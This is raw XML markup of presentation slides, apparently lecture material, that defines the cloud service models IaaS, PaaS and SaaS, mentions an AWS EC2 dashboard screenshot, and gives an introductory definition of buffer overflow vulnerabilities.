                  <a:lnTo>
                    <a:pt x="3993159" y="1090485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3980802" y="1045362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3961130" y="1003808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3934879" y="966597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3902824" y="934453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3865702" y="908138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3824274" y="888415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779291" y="876033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3731514" y="871728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3683724" y="876033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638740" y="888415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3597313" y="908138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3560191" y="934453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528136" y="966597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3501898" y="1003808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3482213" y="1045362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3469856" y="1090485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3465576" y="1138428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3469856" y="1186383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3482213" y="1231506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3501885" y="1273048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528136" y="1310271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3560191" y="1342415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3597313" y="1368729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638740" y="1388452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3683724" y="1400835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3731514" y="1405128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779291" y="1400835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3824274" y="1388452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3865702" y="1368729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3902824" y="1342415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3934879" y="1310271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3961130" y="1273048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3980802" y="1231506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3993159" y="1186383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3997452" y="1138428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7955026" y="4862906"/>
            <a:ext cx="3454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35">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>02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21984" y="5656579"/>
            <a:ext cx="3454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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>01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688194" y="5735828"/>
            <a:ext cx="3454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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>03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64411" y="5140604"/>
            <a:ext cx="4554220" cy="1555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4100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="80" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Infrastructure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65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145" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-85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150" b="1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dirty="0" sz="2200" spc="-85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40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60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60" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(IaaS) </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-645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-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>provides</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="4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90">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>un-configured </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>compute,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>storage,</a:t>
            </a:r>
            <a:endParaRPr sz="2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dirty="0" sz="2200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040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3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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>resources.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74389" y="1756298"/>
            <a:ext cx="8507095" cy="2428875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1885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485"/>
              </a:spcBef>
            </a:pP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Cloud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service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models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referred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anything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as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service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(XaaS).</a:t>
            </a:r>
            <a:endParaRPr sz="2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1395"/>
              </a:spcBef>
            </a:pP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thre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p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m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p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ementation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ar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:</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="173990">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2195"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="95" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Platform</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75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145" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-90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150" b="1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dirty="0" sz="2200" spc="-85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40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75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55" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(PaaS)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="1323975" marR="1141730">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>provides</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>pre-configured </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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404040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2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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-68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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>middleware</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>instances.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172190" y="5426481"/>
            <a:ext cx="3881754" cy="1173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4100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="85" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Software</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75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145" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-95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150" b="1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dirty="0" sz="2200" spc="-95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40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75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55" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(SaaS) </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-650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-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>provides </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>fully </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>developed </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>applications.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44844" y="306451"/>
            <a:ext cx="37668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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-155">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="180">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Models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58967" y="760476"/>
            <a:ext cx="5364480" cy="3657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80588" y="2816351"/>
            <a:ext cx="10405871" cy="537819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017902" y="1955418"/>
            <a:ext cx="1234630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This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screenshot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dashboard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Amazon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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Web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Services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Elastic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Compute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Cloud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(EC2):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1379" y="306451"/>
            <a:ext cx="43338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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-95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pc="80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vulnerabilities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46547" y="760476"/>
            <a:ext cx="5940552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586608" y="1882292"/>
            <a:ext cx="11076940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23240" marR="5080" indent="-510540">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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overflow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attack,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threat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actor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submits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an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input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too</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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large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variable </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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allocated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by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application.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Some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general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overflow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vulnerabilities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are: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70126" y="4246626"/>
            <a:ext cx="6160135" cy="2525395"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6160134" h="2525395">
                <a:moveTo>
                  <a:pt x="0" y="420877"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2832" y="371801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11117" y="324385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24540" y="278946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42784" y="235801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65534" y="195265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92473" y="157654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123285" y="123285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157654" y="92473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195265" y="65534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235801" y="42784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278946" y="24540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324385" y="11117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371801" y="2832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420878" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5739130" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5788206" y="2832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5835622" y="11117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5881061" y="24540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5924206" y="42784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5964742" y="65534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6002353" y="92473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6036722" y="123285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6067534" y="157654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6094473" y="195265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6117223" y="235801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6135467" y="278946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148890" y="324385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6157175" y="371801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="420877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="2104390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6157175" y="2153466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148890" y="2200882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6135467" y="2246321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6117223" y="2289466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6094473" y="2330002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6067534" y="2367613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6036722" y="2401982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6002353" y="2432794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5964742" y="2459733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5924206" y="2482483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5881061" y="2500727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5835622" y="2514150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5788206" y="2522435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5739130" y="2525268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420878" y="2525268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371801" y="2522435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324385" y="2514150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278946" y="2500727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235801" y="2482483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195265" y="2459733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157654" y="2432794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123285" y="2401982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92473" y="2367613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65534" y="2330002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42784" y="2289466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24540" y="2246321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11117" y="2200882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2832" y="2153466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2104390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="420877"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="0075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021204" y="4883913"/>
            <a:ext cx="5227320" cy="1554480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470"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000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Buffer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memo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alloca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14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endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
            </a:pP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application.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="6350" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="113599"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000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Overflows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allow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arbitrary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code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to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execute.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55392" y="3724655"/>
            <a:ext cx="4411980" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4411980" h="984885">
                <a:moveTo>
                  <a:pt x="4247896" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164083" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247896" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4291535" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4330737" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4363942" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4389590" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4406122" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4406122" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4389590" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4363942" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4330737" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4291535" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247896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915283" y="4021328"/>
            <a:ext cx="2091689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Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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Overflow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326373" y="4251197"/>
            <a:ext cx="6162040" cy="2520950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6162040" h="2520950">
                <a:moveTo>
                  <a:pt x="0" y="420115"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2826" y="371120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11095" y="323785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24491" y="278426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42700" y="235357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65405" y="194894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92293" y="157352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123047" y="123047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157352" y="92293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194894" y="65405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235357" y="42700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278426" y="24491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323785" y="11095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371120" y="2826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420116" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5741416" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5790411" y="2826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5837746" y="11095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5883105" y="24491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5926174" y="42700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5966637" y="65405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6004179" y="92293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6038484" y="123047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6069238" y="157352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096126" y="194894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6118831" y="235357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6137040" y="278426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6150436" y="323785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158705" y="371120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="420115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="2100579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158705" y="2149575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6150436" y="2196910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6137040" y="2242269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6118831" y="2285338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096126" y="2325801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6069238" y="2363343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6038484" y="2397648"/>
                </a:lnTo>
